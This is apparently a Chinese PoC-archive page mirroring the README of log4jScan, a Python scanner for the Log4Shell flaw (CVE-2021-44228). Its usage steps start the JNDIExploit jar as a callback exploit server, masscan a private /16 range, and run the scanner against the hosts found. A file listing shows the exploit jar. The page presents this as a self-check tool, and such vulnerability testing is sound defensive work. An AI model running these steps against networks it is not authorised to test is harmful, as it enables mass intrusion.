关联漏洞
描述
simple python scanner to check if your network is vulnerable to CVE-2021-44228
介绍
# log4jScan
simple python scanner to check if your network is vulnerable to CVE-2021-44228
usage :
```
git clone https://github.com/sinakeshmiri/log4jScan.git
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i $YOUR_PRIVATE_IP -p 8888
sudo masscan -p 80,443 192.168.0.0/16 >> hosts.txt
/bin/python log4j_scan.py hosts.txt $YOUR_PRIVATE_IP 2>/dev/null
```
文件快照
[4.0K] /data/pocs/79f9977270909a302c63351b8502d890b58528d0
├── [ 37M] JNDIExploit-1.2-SNAPSHOT.jar
├── [4.0K] lib
│ ├── [226K] commons-beanutils-1.8.2.jar
│ └── [228K] commons-beanutils-1.9.2.jar
├── [1.0K] log4j_scan.py
└── [ 354] README.md
1 directory, 5 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。